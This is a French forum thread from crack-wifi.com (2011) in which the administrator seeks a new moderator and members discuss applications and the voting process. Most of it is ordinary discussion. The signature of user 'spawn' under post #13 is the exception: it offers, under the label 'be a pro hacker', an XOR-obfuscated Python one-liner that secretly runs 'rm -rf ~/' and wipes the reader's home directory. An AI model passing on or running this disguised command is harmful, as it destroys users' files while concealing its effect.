Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 16-10-2011 18:36:47

M1ck3y
Administrateur
Lieu : Lost in the darkness

Appel à candidature: on recherche un nouveau modérateur / trice

Nous sommes à la recherche d'un nouveau modérateur (ou d'une modératrice) pour compléter notre petite équipe. Voici l'équipe qui gère le forum à l'heure actuelle:

-Moi meme pour tout ce qui est administration, et je fais aussi de la modération quand l'occasion se présente.

-Antares145 qui est un modérateur très apprécié et efficace

-Noireaude qui est également un très bon modo

-Koala qui vient de rejoindre notre équipe en tant que modo aujourd'hui meme

Koala a été choisi suite à une concertation en interne, pour le choix d'un quatrième modérateur / trice nous avons choisi de faire un appel à candidatures. Attention, il est inutile de postuler si vous etes inscrit depuis 2 jours et que vous n'avez qu'un post à votre actif. Pour pouvoir accéder au statut de modérateur / trice, certains pré-requis sont nécessaires:

-vous devez avoir une ancienneté de plusieurs mois sur le forum
-vous devez avoir une activité sur le forum avec de nombreux posts à votre actif et une présence régulière
-vous devez avoir un bon état d'esprit, savoir respecter et faire respecter le règlement du forum
-vous devez avoir de bonnes connaissances concernant les thématiques qui sont abordées sur le forum: pentest, wifi, gnu / linux, réseau, informatique en général...
-vous devez etre motivé et passionné

Si vous etes intéressé(e) et que vous vous reconnaissez à travers cette description, alors ça signifie que vous avez le profil pour devenir modérateur / trice sur le forum Crack-wifi.com! Pour postuler, envoyez moi simplement un petit message en MP et écrivez moi quelques lignes en me parlant de ce qui vous motive, ce qui vous intéresse et pourquoi c'est vous que nous devons choisir et pas quelqu'un d'autre. J'attend vos MP wink

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 16-10-2011 19:02:20

M1ck3y
Administrateur

Re : Appel à candidature: on recherche un nouveau modérateur / trice

Et voila déja une première candidature, il s'agit d'algerino qui m'a rédigé un message montrant qu'il prend cette proposition très au sérieux. On attend bien évidemment d'avoir reçu plusieurs candidatures pour choisir quelqu'un, le nouveau modo sera désigné d'ici quelques mois je pense.

#3 16-10-2011 19:20:04

yasmine
Membre Indispensable

M1ck3y a écrit :

....recherche d'un nouveau modérateur ...

Aucune chance pour une modératrice ....

lol:lol::lol:

#4 16-10-2011 19:23:51

koala
Membre d'honneur
Lieu : In the sky

Attention M1ck3y la discrimination te guette tongue

#5 16-10-2011 19:24:48

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

yasmine a écrit :

Aucune chance pour une modératrice ....

Moi je recherche une modératrice pour mon forum

:p lol

1310812721.gif

#6 16-10-2011 19:55:15

M1ck3y
Administrateur

Hop là, pas de discrimination ici on stopppe la polémique j'ai rectifié wink

#7 16-10-2011 20:20:44

yasmine
Membre Indispensable

M1ck3y a écrit :

Hop là, pas de discrimination ici on stopppe la polémique j'ai rectifié wink

Fallait pas rectifier,
C'etait juste pour blaguer, .....

#8 18-10-2011 18:25:02

M1ck3y
Administrateur

J'ai tout de meme rectifié, par respect pour les filles qui fréquentent le forum, et puis parce que nous sommes ouverts à toutes les candidatures.

J'ai eu le plaisir de recevoir aujourd'hui une deuxième candidature, il s'agit de kcdtv qui m'a parlé de ses motivations. Message bien reçu l'ami smile

Si vous pensez que fous feriez un bon modérateur, contactez moi!

#9 18-10-2011 19:44:25

yasmine
Membre Indispensable

M1ck3y a écrit :

..., par respect pour les filles ......q

...... un bon modérateur, contactez moi!

#10 18-10-2011 19:48:56

M1ck3y
Administrateur

Oui enfin tu m'as compris big_smile

#11 19-10-2011 08:22:28

goliate
Membre Irremplaçable
Site Web

j'aurais postuler mais manque de temps de ma part dommage -_-. wink

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#12 20-10-2011 21:04:47

M1ck3y
Administrateur

Quand j'ai vu que tu avais répondu j'ai cru que... On en est donc toujours à deux candidatures.

#13 21-10-2011 10:11:05

spawn
Modérateur

Une seconde, j'arrive. smile

Edit : En fait, je risque de ne pas avoir assez de tempspour la modération. Donc rien finalement.

Dernière modification par spawn (31-10-2011 21:59:30)

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#14 21-10-2011 11:35:52

goliate
Membre Irremplaçable
Site Web

Voila j'ai poster ma candidature en ésperant ><.

Mais au faite, l'appelle de candidature se fini  quand?

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#15 22-10-2011 09:16:13

M1ck3y
Administrateur

spawn a écrit :

Dois je en déduire que tu vas postuler? Si c'est le cas tu dois m'envoyer un MP comme expliqué plus haut.

Goliate a donc postulé lui aussi, il m'a expliqué quelles sont ses motivations.

Il n'y a pas de date définie mais la désignation du nouveau modo devrait avoir lieu d'ici la fin de l'année, ou bien en début d'année prochaine.

#16 22-10-2011 09:42:33

goliate
Membre Irremplaçable
Site Web

Ok merci de ta précision ><

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#17 23-10-2011 09:18:54

toto
Membre V.I.P.
Lieu : chez le docteur aussi

spawn a écrit :

idem je me lance dans la semaine pour déposer ma candidature moi aussi ...

#18 23-10-2011 11:50:59

algerino
Membre d'Or

Si je comprend bien M1ck3y le nouveau modérateur sera Goliate il à une ancienneté de plusieurs mois sur le forum wink ou peut être que tu te bases sur les motivations des candidatures?

ps : je voulais juste savoir comment tu feras ton choix?

Dernière modification par algerino (23-10-2011 11:51:36)

Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

#19 23-10-2011 12:46:16

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Ca paraît pourtant clair. Sans vouloir parler à la place de M1ck3y le choix sera fait par rapport aux candidatures et surtout après une consultation commune de toute l'équipe.

c'est vous que nous devons choisir et pas quelqu'un d'autre. J'attend vos MP wink

Ca n'aurait pas de sens et cela ne serait pas honête de notre part de laisser ce post ouvert si ous avions déjà choisi.

Tu as donc encore toutes tes chances comme les autres, ne baisse pas les bras et ne fais pas de déductions hâtives qui pourraient te démotiver inutilement wink.

De toute façon, pour te rassurer je pense que nous tomberons d'accord qu'après un vote préalable.
Ce qui est la meilleur manière de faire en terme d'intégrité car cela évite que l'avis d'une seule personne se substitue aux autres.

Pour info Koala a été désigné par nous, mais également par la voix d'un vote interne.
C'est justement pour qu'il n'y ai pas de jaloux que nous avons pensé qu'une deuxième consultation publique serait bienvenue et équitable.
Une fois la liste des candidatures closes, nous procèderons alors à un nouveau vote interne.

Je propose si M1ck3y est d'accord une publication officielle des résultats le moment venu.

Mais la concurrence est féroce c'est sûr !!!

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#20 23-10-2011 12:53:48

goliate
Membre Irremplaçable
Site Web

algerino a écrit :

Si je comprend bien M1ck3y le nouveau modérateur sera Goliate il à une ancienneté de plusieurs mois sur le forum wink ou peut être que tu te bases sur les motivations des candidatures?

Je doiot dire que même si je ne suis pas prit comme moderateur, je continurais a poster se que je trouve utile et apporter ma contribution au forum, de toute façon c'est a sa que sert de s'inscrire sur un forum, enfin je trouve.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#21 23-10-2011 13:11:08

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

goliate a écrit :

Je doiot dire que même si je ne suis pas prit comme moderateur, je continurais a poster se que je trouve utile et apporter ma contribution au forum, de toute façon c'est a sa que sert de s'inscrire sur un forum, enfin je trouve.

Idem, j'attache moins d'importance au fait d'être modo que de venir me détendre ici.
Si demain je n'ai plus le temps je rendrais les armes et je continuerais à venir quand même.

Je ne suis pas résté car je suis passé modo mais parce que j'ai un peu l'impression d'être "chez moi" ici, c'est ça la forme de cette communauté et de ce forum.
Petit noyau, mais grande cohésion et un super super esprit. De loin supérieur à pas mals de forums que j'ai fréquenté qui n'étaient que des foires à trolls ou à pubs.

En plus je vous le dis tout net, être modo c'est pas évident, il faut bien le garder à l'esprit.
Je pense en toute objectivité, m'être gauffré plus d'une fois dans certaines remarques ou certains bans.
Une fois que c'est fait, c'est fait, on peut revenir en arrière mais on perd alors une certaine crédibilité.

Bon je pars du princpe que si le gars trouve que c'est injuste il peut toujours me contacter et on peut en parler.
J'en ai pas parlé mais ça m'est déjà arrivé pas plus tard que la semaine dernière.

Alors si on est peu scrupuleux on se dit osef (on s'en fout) et basta.
Pour moi ça reste une "tache" et un cas de consience pedant longtemps quand je pense avoir peut être fais une erreur.

D'autant plus que malgrès ma gouaille et c'est dificile à croire.
Je suis quelqu'un de plutôt naturellement timide, qui préfère en génral raser les murs et se fondre dans le décor.

Bref tout ça pour dire, ne le prenez pas à la légère si vous êtes sérieux et que vous postulez. Il y a de vrais choix à faire, de vrais cas de consience et vous devrez dès fois enfiler votre costume de père fouettard et paraître impopulaire. Il faut pouvoir le gérer.
On est pas toujours très à l'aise et dès fois on préfèrerais être arrivé après l'autre modo lol.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#22 23-10-2011 13:35:02

toto
Membre V.I.P.
Lieu : chez le docteur aussi

noireaude a écrit :

Je ne suis pas résté car je suis passé modo mais parce que j'ai un peu l'impression d'être "chez moi" ici, c'est ça la forme de cette communauté et de ce forum.
Petit noyau, mais grande cohésion et un super super esprit. De loin supérieur à pas mals de forums que j'ai fréquenté qui n'étaient que des foires à trolls ou à pubs.

C'est moi aussi pour ça je poste moins mais je lis tous je me sent chez moi ici j'essaie de faire attention a ce que je dis mais je ne suis qu'un passionné avant tout pas un pro loin de là

mais l'envie de faire un ti tuto qui sort de l'ordinaire me démange smile

je remet cette semaine mon labo pour du lourd smile

#23 23-10-2011 13:37:18

koala
Membre d'honneur
Lieu : In the sky

Tout a fait d'accord avec toi goliate smile

Idem, je me sens bien ici et le fait d'etre modo n'est qu'un plus, l'ambiance du forum y est pour beaucoup wink

Sinon je trouve que tu es efficace noireaude, on se gourre tous a un moment, c'est normal, c'est humain, l'essentiel est de pouvoir réparé son erreur si possible ou d'en tirer la leçon.

#24 23-10-2011 13:47:34

M1ck3y
Administrateur

algerino a écrit :

C'est comme si tu postulais pour un job: tu envoies ta candidature, et puis le reste n'est plus de ton ressort. On se charge de décider qui sera choisi. Goliate n'a ni plus ni moins de chances qu'un autre d'etre choisi, ce que tu as écrit n'a aucun sens. Autant te le dire clairement: ce sujet n'est pas destiné à tourner en polémique, il est donc inutile de poser ce genre de questions. Ceux qui souhaitent postuler m'envoient un MP, ensuite un choix sera fait entre les membres de l'équipe histoire de décider qui est le plus apte à remplir la fonction de modo tout simplement. Il y aura forcément plusieurs candidats et un seul élu, ce n'est pas pour autant que ceux qui n'auront pas été choisis devront se sentir pénalisés.

Les critères qui permettent de déterminer le choix d'un bon modo figurent dans le premier message de ce topic, pas la peine de venir poser la question alors que la réponse figure ici meme. On peut simplement ajouter (je ne l'ai pas écrit car ça me paraissait évident) que l'orthographe et la qualité rédactionnelle des posts est bien entendu un élément qui a son importance, et que l'attitude des membres depuis leur inscription, leur état d'esprit et leur comportement en général seront pris en compte.

Etre modérateur n'est pas forcément facile comme l'a expliqué noireaude. Ca demande du boulot, du temps, du sang froid... Merci de ne pas polluer ce sujet, envoyez moi un MP si vous souhaitez postuler comme je l'ai déja expliqué au début de ce topic.

#25 23-10-2011 13:58:46

algerino
Membre d'Or

Monsieur l'administrateur je trouve ce message un peu "brutale".

C'est comme si tu postulais pour un job: tu envoies ta candidature, et puis le reste n'est plus de ton ressort. On se charge de décider qui sera choisi. Goliate n'a ni plus ni moins de chances qu'un autre d'etre choisi, ce que tu as écrit n'a aucun sens. Autant te le dire clairement: ce sujet n'est pas destiné à tourner en polémique, il est donc inutile de poser ce genre de questions.

Polémique? pourquoi ça? c'est juste par simple curiosité. pourquoi s'inventer des choses dont on ne sait pas?

Merci de ne pas polluer ce sujet, envoyez moi un MP si vous souhaitez postuler comme je l'ai déja expliqué au début de ce topic.

Je suis desolé mais je n'essaie pas de spammer le forum mais d'être clair avec vous. si tout.

Tout a fait d'accord avec toi Noireaude, bien dit wink et je comprend mieux le fonctionnement du vote.

Dernière modification par algerino (23-10-2011 14:00:27)

Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Annonce